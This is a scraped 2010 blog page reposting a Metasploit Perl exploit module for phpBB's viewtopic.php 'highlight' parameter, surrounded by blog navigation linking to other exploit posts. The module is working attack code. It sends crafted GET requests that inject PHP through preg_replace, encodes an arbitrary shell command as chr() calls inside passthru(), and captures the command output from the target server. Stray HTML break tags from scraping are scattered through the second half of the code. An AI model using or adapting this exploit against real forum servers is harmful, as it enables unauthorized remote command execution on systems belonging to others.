##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::phpbb_highlight;
use base "Msf::Exploit";
use Pex::Text;
use strict;
my $advanced = { };
my $info =
{
'Name' => 'phpBB viewtopic.php Arbitrary Code Execution',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'valsmith [at] attackresearch.com>',
'H D Moore ',
],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'PHPBB_ROOT' => [1, 'URL', 'The phpBB root Directory', '/phpbb'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 1024,
'Keys' => ['cmd', 'cmd_bash'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits two arbitrary PHP code execution flaws in the
phpBB forum system. The problem is that the 'highlight' parameter
in the 'viewtopic.php' script is not verified properly and will
allow an attacker to inject arbitrary code via preg_replace().
}),
'Refs' =>
[
['OSVDB', 11719],
['OSVDB', 17613],
],
'DefaultTarget' => 0,
'Targets' => [
['Autotarget',0],
['phpbb <2.0.11', 1],
['phpbb <2.0.15', 2],
],
'Keys' => ['phpBB'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
my $target_idx = $self->GetVar('TARGET');
my $phpbb_root = $self->GetVar('PHPBB_ROOT');
my $user_agent = $self->GetVar('USER_AGENT');
my $target = $self->Targets->[$target_idx];
my $url;
my $byte;
# Add an echo on each end for easy output capturing
$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";
# Encode the command as a set of chr() function calls
if ($target_idx == 0) {
$url = $phpbb_root."/viewtopic.php?t=1&highlight=";
$url .= "%2527"."%252e"."phpinfo()". "%252e"."%2527";
my $request =
"GET $url HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";
$self->PrintLine("[*] Sending the malicious GET request...");
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($request);
my $results = $s->Recv(-1, 20);
$s->Close();
if ($results =~ /\phpinfo/) {
<br /> $target_idx = 1;
<br /> }
<br />
<br /> else { $target_idx = 2; }
<br />
<br /> }
<br />
<br /> if ($target_idx =~ /1/) {
<br /> $byte = join('%252e', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
<br /> $url = $phpbb_root."/viewtopic.php?t=1&highlight=";
<br /> $url .= "%2527"."%252e"."passthru($byte)". "%252e"."%2527";
<br /> }
<br />
<br /> if ($target_idx =~ /2/) {
<br /> $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
<br /> $url = $phpbb_root."/viewtopic.php?t=1&highlight=";
<br /> $url .= "%27."."passthru($byte)".".%27";
<br />
<br /> }
<br />
<br /> my $request =
<br /> "GET $url HTTP/1.1\r\n".
<br /> "Host: $vhost:$target_port\r\n".
<br /> "Connection: Close\r\n".
<br /> "\r\n";
<br />
<br /> $self->PrintLine("[*] Sending the malicious GET request...");
<br /> my $s = Msf::Socket::Tcp->new
<br /> (
<br /> 'PeerAddr' => $target_host,
<br /> 'PeerPort' => $target_port,
<br /> 'SSL' => $self->GetVar('SSL'),
<br /> );
<br /> if ($s->IsError) {
<br /> $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
<br /> return;
<br /> }
<br />
<br /> $s->Send($request);
<br /> my $results = $s->Recv(-1, 20);
<br /> $s->Close();
<br />
<br /> if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
<br /> my $out = $1;
<br /> $out =~ s/^\s+|\s+$//gs;
<br /> if ($out) {
<br /> $self->PrintLine('----------------------------------------');
<br /> $self->PrintLine('');
<br /> $self->PrintLine($out);
<br /> $self->PrintLine('');
<br /> $self->PrintLine('----------------------------------------');
<br /> }
<br /> }
<br />
<br /> return;
<br />}
<br />
<br />1;</code>
<div style='clear: both;'></div>
</div>
<div class='post-footer'>
<div class='post-footer-line post-footer-line-1'>
<span class='post-author vcard'>
Posted by
<span class='fn'>XyLeM</span>
</span>
<span class='post-timestamp'>
at
<a class='timestamp-link' href='http://meta-sploit.blogspot.com/2010/01/phpbb-highlight-remote-exploit-for.html' rel='bookmark' title='permanent link'><abbr class='published' title='2010-01-04T11:18:00-08:00'>11:18 AM</abbr></a>
</span>
<span class='reaction-buttons'>
</span>
<span class='star-ratings'>
</span>
<span class='post-comment-link'>
</span>
<span class='post-backlinks post-comment-link'>
</span>
<span class='post-icons'>
<span class='item-control blog-admin pid-679096321'>
<a href='https://www.blogger.com/post-edit.g?blogID=6914650419156458125&postID=3043783718680326261&from=pencil' title='Edit Post'>
<img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/>
</a>
</span>
</span>
</div>
<div class='post-footer-line post-footer-line-2'>
<span class='post-labels'>
Labels:
<a href='http://meta-sploit.blogspot.com/search/label/phpBB' rel='tag'>phpBB</a>,
<a href='http://meta-sploit.blogspot.com/search/label/Remote' rel='tag'>Remote</a>,
<a href='http://meta-sploit.blogspot.com/search/label/sploitz' rel='tag'>sploitz</a>
</span>
</div>
<div class='post-footer-line post-footer-line-3'>
<span class='post-location'>
</span>
</div>
</div>
</div>
<div class='comments' id='comments'>
<a name='comments'></a>
<h4>
0
comments:
</h4>
<dl class='avatar-comment-indent' id='comments-block'>
</dl>
<p class='comment-footer'>
<div class='comment-form'>
<a name='comment-form'></a>
<h4 id='comment-post-message'>Post a Comment</h4>
<p>
</p>
<a href='https://www.blogger.com/comment/frame/6914650419156458125?po=3043783718680326261&hl=en' id='comment-editor-src'></a>
<iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' frameborder='0' height='410px' id='comment-editor' name='comment-editor' src='' width='100%'></iframe>
<script src='https://www.blogger.com/static/v1/jsbin/4269703388-comment_from_post_iframe.js' type='text/javascript'></script>
<script type='text/javascript'>
BLOG_CMT_createIframe('https://www.blogger.com/rpc_relay.html');
</script>
</div>
</p>
<div id='backlinks-container'>
<div id='Blog1_backlinks-container'>
</div>
</div>
</div>
<!--Can't find substitution for tag [adEnd]-->
</div>
<div class='blog-pager' id='blog-pager'>
<span id='blog-pager-newer-link'>
<a class='blog-pager-newer-link' href='http://meta-sploit.blogspot.com/2010/01/sasser-ftpd-remote-exploit-for-ftp.html' id='Blog1_blog-pager-newer-link' title='Newer Post'>Newer Post</a>
</span>
<span id='blog-pager-older-link'>
<a class='blog-pager-older-link' href='http://meta-sploit.blogspot.com/2010/01/netcat-like-console-command-connect.html' id='Blog1_blog-pager-older-link' title='Older Post'>Older Post</a>
</span>
<a class='home-link' href='http://meta-sploit.blogspot.com/'>Home</a>
</div>
<div class='clear'></div>
</div></div>
</div>
<div id='sidebar-wrapper'>
<div class='sidebar section' id='sidebar'><div class='widget Label' data-version='1' id='Label1'>
<h2>Labels</h2>
<div class='widget-content list-label-widget-content'>
<ul>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Console'>Console</a>
<span dir='ltr'>(1)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/FTP'>FTP</a>
<span dir='ltr'>(1)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Hacking'>Hacking</a>
<span dir='ltr'>(9)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/IE'>IE</a>
<span dir='ltr'>(1)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Infos'>Infos</a>
<span dir='ltr'>(1)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Metasploit%203.x'>Metasploit 3.x</a>
<span dir='ltr'>(1)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Meterpreter'>Meterpreter</a>
<span dir='ltr'>(1)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Microsoft%20IIS'>Microsoft IIS</a>
<span dir='ltr'>(1)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Netcat-like'>Netcat-like</a>
<span dir='ltr'>(1)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/phpBB'>phpBB</a>
<span dir='ltr'>(1)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Remote'>Remote</a>
<span dir='ltr'>(2)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/SMB'>SMB</a>
<span dir='ltr'>(1)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/SMB2'>SMB2</a>
<span dir='ltr'>(1)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/sploitz'>sploitz</a>
<span dir='ltr'>(4)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Update'>Update</a>
<span dir='ltr'>(2)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Vid'>Vid</a>
<span dir='ltr'>(6)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Vista'>Vista</a>
<span dir='ltr'>(1)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/VNC'>VNC</a>
<span dir='ltr'>(2)</span>
</li>
<li>
<a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Windows'>Windows</a>
<span dir='ltr'>(4)</span>
</li>
</ul>
<div class='clear'></div>
</div>
</div><div class='widget BlogArchive' data-version='1' id='BlogArchive1'>
<h2>Blog Archive</h2>
<div class='widget-content'>
<div id='ArchiveList'>
<div id='BlogArchive1_ArchiveList'>
<ul>
<li class='archivedate expanded'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy toggle-open'>
▼
</span>
</a>
<a class='post-count-link' href='http://meta-sploit.blogspot.com/2010/'>2010</a>
<span class='post-count' dir='ltr'>(16)</span>
<ul>
<li class='archivedate expanded'>
<a class='toggle' href='javascript:void(0)'>
<span class='zippy toggle-open'>
▼
</span>
</a>
<a class='post-count-link' href='http://meta-sploit.blogspot.com/2010/01/'>January</a>
<span class='post-count' dir='ltr'>(16)</span>
<ul class='posts'>
<li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-reverse-vnc-hidden-in-word.html'>Metasploit: Reverse VNC hidden in a Word file</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/exploiting-microsoft-iis-with.html'>Exploiting Microsoft IIS with Metasploit</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-what-is-it.html'>Metasploit? What is it?</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-33-released.html'>Metasploit 3.3 Released</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-framework.html'>The Metasploit Framework</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-msvidctlmpeg2.html'>Metasploit - msvidctl_mpeg2</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/hacking-malware-video-tut.html'>Hacking Malware [Video Tut]</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/sasser-ftpd-remote-exploit-for-ftp.html'>Sasser FTPd - Remote exploit for the FTP</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/phpbb-highlight-remote-exploit-for.html'>phpBB Highlight - Remote exploit for phpBB</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/netcat-like-console-command-connect.html'>Netcat-like Console Command: Connect</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-mass-exploitation-for.html'>Metasploit Mass Exploitation for Dummies</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-post-exploitation.html'>Metasploit Post Exploitation - Prefetchtool Meterp...</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-vnc-injecting.html'>Metasploit - VNC Injecting</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-ie-unsafe-scripting-exploit.html'>Metasploit - IE Unsafe Scripting Exploit</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-msrpc-exploit.html'>Metasploit - msrpc exploit</a></li>
<li><a href='http://meta-sploit.blogspot.com/2010/01/hack-windows-vista-with-metasploit.html'>Hack Windows Vista with Metasploit</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<div class='clear'></div>
</div>
</div></div>
</div>
<!-- spacer for skins that want sidebar and main to be the same height-->
<div class='clear'> </div>
</div>
<!-- end content-wrapper -->
<div id='footer-wrapper'>
<div class='footer no-items section' id='footer'></div>
<center><a href='http://www.metasploit.com/framework/download/'><img src='http://i48.tinypic.com/212y4hi.jpg2'/></a>
<a href='http://books.google.com/books?q=metasploit'><img src='http://i47.tinypic.com/2zz5ag6.png'/></a></center>
</div>
</div></div>
<!-- end outer-wrapper -->
<script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/1807328581-widgets.js"></script>
<script type='text/javascript'>
window['__wavt'] = 'AOuZoY7Xn86zXr9PQbCzHVbjeUNI8XQoXQ:1714091200087';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d6914650419156458125','//meta-sploit.blogspot.com/2010/01/phpbb-highlight-remote-exploit-for.html','6914650419156458125');
_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '6914650419156458125', 'title': 'CLOSED', 'url': 'http://meta-sploit.blogspot.com/2010/01/phpbb-highlight-remote-exploit-for.html', 'canonicalUrl': 'http://meta-sploit.blogspot.com/2010/01/phpbb-highlight-remote-exploit-for.html', 'homepageUrl': 'http://meta-sploit.blogspot.com/', 'searchUrl': 'http://meta-sploit.blogspot.com/search', 'canonicalHomepageUrl': 'http://meta-sploit.blogspot.com/', 'blogspotFaviconUrl': 'http://meta-sploit.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22CLOSED - Atom\x22 href\x3d\x22http://meta-sploit.blogspot.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22CLOSED - RSS\x22 href\x3d\x22http://meta-sploit.blogspot.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22CLOSED - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/6914650419156458125/posts/default\x22 /\x3e\n\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22CLOSED - Atom\x22 href\x3d\x22http://meta-sploit.blogspot.com/feeds/3043783718680326261/comments/default\x22 /\x3e\n', 'meTag': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/16e657cb9c57b8a2', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'Twitter', 'key': 'twitter', 'shareMessage': 'Share to Twitter', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27en\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'item', 'postId': '3043783718680326261', 'pageName': 'phpBB Highlight - Remote exploit for phpBB', 'pageTitle': 'CLOSED: phpBB Highlight - Remote exploit for phpBB'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'phpBB Highlight - Remote exploit for phpBB', 'description': 'By Attack Research\r \r ##\r # This file is part of the Metasploit Framework and may be redistributed\r # according to the licenses defined in t...', 'url': 'http://meta-sploit.blogspot.com/2010/01/phpbb-highlight-remote-exploit-for.html', 'type': 'item', 'isSingleItem': true, 'isMultipleItems': false, 'isError': false, 'isPage': false, 'isPost': true, 'isHomepage': false, 'isArchive': false, 'isLabelSearch': false, 'postId': 3043783718680326261}}]);
_WidgetManager._RegisterWidget('_NavbarView', new _WidgetInfo('Navbar1', 'navbar', document.getElementById('Navbar1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', document.getElementById('Header1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/1666805145-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/13464135-lightbox_bundle.css'}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_LabelView', new _WidgetInfo('Label1', 'sidebar', document.getElementById('Label1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_BlogArchiveView', new _WidgetInfo('BlogArchive1', 'sidebar', document.getElementById('BlogArchive1'), {'languageDirection': 'ltr', 'loadingMessage': 'Loading\x26hellip;'}, 'displayModeFull'));
</script>
</body>
</html> Monday, January 4, 2010
phpBB Highlight - Remote exploit for phpBB
By Attack Research